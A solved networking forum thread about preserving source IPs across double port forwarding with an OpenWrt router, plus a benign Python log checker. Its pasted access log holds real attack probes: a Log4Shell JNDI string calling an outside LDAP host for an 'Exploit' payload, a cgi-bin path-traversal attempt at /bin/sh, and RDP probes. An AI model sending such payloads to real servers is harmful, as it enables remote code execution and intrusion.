[Solved] Port forward while keeping the source IP

Hi,

I have a problem similar to "Need original source IP on forwarded traffic", but I didn't find a solution in that topic.

My network config:

  • ISP router: router mode, 192.168.1.254, set to forward the port to my OpenWRT
  • OpenWRT: 192.168.1.1, set to forward the port to my server
  • Server: 192.168.1.23, receives the connection

When my router was my default gateway, I just needed to make a port forward from my ISP router to my server, and the source IP was kept.

When the OpenWRT is the default gateway, the previous rules don't work anymore...
So I set up the two forwarding rules; it worked, but I lost the source IP.

167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "-"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "PRI * HTTP/2.0" 400 154 "-" "-"
124.223.101.87 - - [06/Mar/2022:10:43:50 +0000] "GET / HTTP/1.1" 444 0 "-" "/${jndi:ldap://185.203.118.200:1389/Exploit}"
62.233.50.179 - - [06/Mar/2022:10:46:12 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:11:09:32 +0000] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.218.143 - - [06/Mar/2022:11:39:10 +0000] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
45.146.165.37 - - [06/Mar/2022:12:23:31 +0000] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [06/Mar/2022:13:08:23 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [06/Mar/2022:13:25:03 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
89.248.165.24 - - [06/Mar/2022:14:02:39 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:14:55:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 154 "-" "-"
66.249.76.50 - - [06/Mar/2022:15:20:52 +0000] "GET /robots.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.146.165.37 - - [06/Mar/2022:16:07:06 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.94.93.3 - - [06/Mar/2022:16:15:48 +0000] "GET /admin/config.php HTTP/1.1" 400 252 "-" "gbrmss/7.29.0"
176.58.109.214 - - [06/Mar/2022:16:30:44 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
207.46.13.95 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
172.105.89.161 - - [06/Mar/2022:16:51:49 +0000] "GET /0bef HTTP/1.0" 400 252 "-" "-"
40.77.167.65 - - [06/Mar/2022:17:08:34 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.218.78 - - [06/Mar/2022:17:19:35 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:37 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:38 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:55:55 +0000] "+\xF0\xBB\xD2\x19\xFD\x11\xDE\x0B\x87\x04\x81\xFDz\xF6s\xEFl\xE9e" 400 154 "-" "-"
192.168.1.1 - - [07/Mar/2022:11:57:23 +0000] "GET / HTTP/1.1" 500 174 "-" "libwww-perl/6.61"
192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:51:14 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:52 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "GET /text4041646657511 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "POST /sdk HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:54 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /evox/about HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /HNAP1 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:52:19 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"


Is making 2 port forwards the right thing to do?
Can I allow traffic between WAN and my server directly?
How can I keep the source IP?

Thanks for the help

Since they're in the same network, the main router should be forwarding directly to the server on its LAN. The OpenWrt router really isn't routing anything here, it is not part of the connection from the Internet to the server.

Internet -> (your public IP on the 192.168.1.254 router) -> 192.168.1.23

The packet arriving at 192.168.1.23 will have the Internet user's IP as its source address. The server will send a response to the Internet at this address, which should be forwarded as the default gateway through the 192.168.1.254 router.

2 Likes
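
The symptom in the question's log (every request arriving from 192.168.1.1 once the second forward was in place) can be checked for automatically. The following is an added example, not part of the original posts: it flags a private client address that presents several unrelated User-Agents on the same day, which is what source NAT in front of a public service looks like. The sample lines are constructed, and the function name and the `min_agents` threshold are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Explicit RFC 1918 ranges; ipaddress.is_private would also match the
# documentation ranges used for the constructed public clients below.
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Combined log format: client - user [day:time zone] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>[^:\]]+):[^\]]*\] '
    r'"(?P<req>.*?)" (?P<status>\d{3}) \S+ "(?P<ref>.*?)" "(?P<ua>.*)"$')

def masked_sources(lines, min_agents=3):
    """Return {(day, private_ip): sorted user agents} for private client
    addresses that show at least min_agents distinct User-Agents in a day."""
    agents = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # not a combined-format line
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue                      # client field is not an IP address
        if m["ua"] != "-" and any(ip in net for net in RFC1918):
            agents[(m["day"], str(ip))].add(m["ua"])
    return {k: sorted(v) for k, v in agents.items() if len(v) >= min_agents}

# Constructed sample: day one shows real client addresses, day two shows
# everything collapsed onto the forwarding router's LAN address.
SAMPLE = [
    '198.51.100.7 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.9 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
    '192.168.1.50 - - [06/Mar/2022:18:00:00 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.75.0"',
    '192.168.1.1 - - [07/Mar/2022:11:57:23 +0000] "GET / HTTP/1.1" 500 174 "-" "libwww-perl/6.61"',
    '192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
    '192.168.1.1 - - [07/Mar/2022:12:51:14 +0000] "GET / HTTP/1.0" 500 174 "-" "-"',
    '192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"',
]

if __name__ == "__main__":
    for (day, ip), uas in masked_sources(SAMPLE).items():
        print(f"{day}: {ip} carries {len(uas)} distinct user agents, source IP is likely being rewritten")
```

While the source address is rewritten like this, per-IP controls on the server (rate limits, ban lists, geo rules) act on the router's address instead of the real client's.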

Forcing the gateway 192.168.1.254 on my server solved my problem.

The solution was easy :sweat_smile:

Thanks
